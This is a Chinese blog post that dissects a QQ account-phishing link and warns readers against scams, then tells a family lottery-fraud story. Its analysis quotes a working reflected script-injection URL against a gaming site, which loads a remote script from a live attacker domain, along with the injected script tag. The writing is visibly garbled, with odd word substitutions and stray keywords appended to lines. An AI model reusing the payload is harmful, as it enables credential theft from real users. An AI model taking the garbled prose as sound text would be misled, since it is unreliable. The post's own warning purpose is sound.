不要再被骗了------QQ盗号原理大揭秘
前言
相信你们在懵懂无知的时候都有被盗号的经历吧,QQ胡乱的加好友,忽然有个好友传了个文件给你,打开之后发现QQ居然显示强制下线,而后再也上不去了QAQ,很明显,QQ号被人盗了。最近也是不少小伙伴私信我,也看了一些人发空间说QQ号被盗了啥的,以及我本身收到的一些诈骗请求。网上针对防骗这块的文章几乎没有,为了避免让更多的人受害,下面我将会以最真实朴素的语言介绍最多见的一种盗号诈骗方式,浅析一下这个盗号原理的全过程~~~但愿你们不要再上当受骗啦~!php
正文
下面我给你们介绍一种最多见的QQ诈骗方式。数据库
这个是我今早收到的一条连接,相信很多朋友确定也收到相似的连接吧,甚至乎不少人都说由于点开这个连接被盗号吧。。。只有不懂安全,没用安全意识的人才会这么说吧!!!api
让我带你们来剖析一下这个东东吧~~~浏览器
很明显,你看这个域名看不出任何眉头,既然你们都不敢点,我就替你们点点看~~~安全
首先咱们在手机端点开这个连接服务器
点开一看,咱们能够看到,是一个QQ空间登陆界面,这个界面就是一个欺骗用户的界面,为何这么说呢,你把这个界面连接复制出来,用浏览器打开,你会发现网页没法打开,而且域名成了下面这个:app
http://sdk.h5.gamedog.cn/apih5v2/getIsLogin/?callback=%00%00%00%00%00%00%00%3CscripT/src%3D//p10t.cn/app.php%3Faid%3D5%3E%3C/scripT%3E%3C!--&bqvoqvwqtujhigzkumjk.png
看样子域名被浏览器解析成了一张png图片,你可能会有点好奇这个,咱们用pc端按照这个地址进行追踪,用F12查看网页源代码网站
<scripT/src=//p10t.cn/app.php?aid=5></scripT><!--({"code":-2,"msg":"\u7528\u6237\u672a\u767b\u5f55"})
就只有这么一行,咱们能够看到从登陆页面输入完帐号密码之后会跳转到一个app.php网页里面,咱们循规蹈矩,直接去追踪访问那个界面spa
有点意思,网页从QQ空间进行跳转的3d
window.location.href = "http://qzone.qq.com";
学过JavaScript的朋友应该知道,location.href="网站连接",表示从新定向到新页面,同时刷新打开的这个页面;
这个意思是从一个伪QQ空间的页面上输入帐户密码,这个页面被植入了php的恶意木马,经过跳转重定向,直接跳转到了木马网站去了,后台数据库并记录了这条信息,而后你的QQ号帐户密码就被别人成功获取了~~~
若是不信的话,咱们能够一块儿来试一试
首先输入帐号密码。。。咱们就随便伪造一个,帐号是3838438,密码就写一个mmpsbsbsb试试看!!!
这里还要说一点,我试的时候这里好像作的还挺真实的,防中文输入,我原本想直接开口大骂呢,hhhh,没给我这个机会。。。
这里不管输入什么帐号密码均可以过,除了中文没法检测,帐号必须是一连串的数字,密码防了中文输入。
而后我点击登陆
看吧,直接就登陆成功了,还有这张图片,这这这。。。彻底就是挑衅啊,居然贴一张小狗的图片,是在考验我智商嘛?
我尝试了一下ping它的主页,ping p10t.cn
ping通了,说明这个网站还活着。
可是登陆页面显示403错误,服务器拒绝访问,我不是很清楚如何绕过这一防线。
那我也没辙了,技术不够精湛,我只能写下这篇文章记录一下,但愿更多的人看到,不要再上当受骗了就好~~~
若是文章哪里写的有出路的地方,但愿各位不吝赐教,若是有更好的解决方案,欢迎在评论区留言或私信给我,感谢你们的支持~~~
关于其余类型的诈骗
可能有些人遇到一些其余的诈骗,好比电话诈骗,短信诈骗,讲一个最真实的例子,推荐大家看一部电影,叫嘉年华,里面讲述的是关于电信诈骗的案件,这部电影是由真实事件改编而成的,很是推荐你们观看,里面有一些防诈骗的技巧,看完之后你会对常见的诈骗手段有了一个更深层次的了解。
若是没有找到资源的小伙伴,我也会在文章中分享给大家一个百度云连接,保存之后下载观看便可:连接:https://pan.baidu.com/s/1CrYJ9jtkSqqxzZSlzQTsqA 密码:2qlz
说这么多,可能你们会认为我在吹牛皮,认为这些事情不会发生在本身身上。我讲一个最真实的例子,我母亲由于前段时间地上见到一张彩票,刮开奖说中了10w块钱,我身在一个并不宽裕的家庭,按照如今的话来说,算是贫农家庭,还远没达到小康水平,想一想看,10w块钱从天而降,对于咱们这种家庭,这绝对算是一笔至关的财富,当时我妈拿着彩票回家,和我还有我爸商量来着,我一看说,这确定是骗局吧,这么好的事情为何恰恰出如今咱们身上,天上不会掉馅饼,努力奋斗才能梦想成真,我妈偏不信这个邪,想去试一试,而后拨打了上面的电话,上面巴拉巴拉说了一大堆,意思就是要交3000块钱税钱啥的,而后才能兑换这个钱,你看,这不明显是骗局嘛,我妈又以为,若是获得了这个钱,至关于她少上多少年的班,其实说白了这一切都是为了这个不争气的我,我其实也是很愧疚的。因此朋友们要记住,只要谈到钱这个问题,要悠着点,十有八九都是骗局,我妈最后是按照地址打钱过去了,而后事实上,对方并无想要兑换的意思,巴拉巴拉说了一大堆,好像又是要交钱。。。我妈如今才意识到被骗了,而后跑到警局报了案,警方说,你不是第一个了,关于彩票中奖被骗的人一大堆,他们说没有足够的证据线索,立不了案,没办法了,3k被狗吃了,这但是辛辛苦苦东奔西跑的血汗钱,这些骗子也是一点良心都没有,因此。。。后来我励志要当一名网警,要把这些逍遥法外的人绳之以法,天网恢恢疏而不漏,这些人最终必定逃不了法律的制裁的。
后记
关于盗号这一问题,我给你们提醒两句,只要少一点好奇心,少一点贪欲,多一点警戒之心,不论是什么类型的诈骗都不会出如今你身上,谨记哦。。。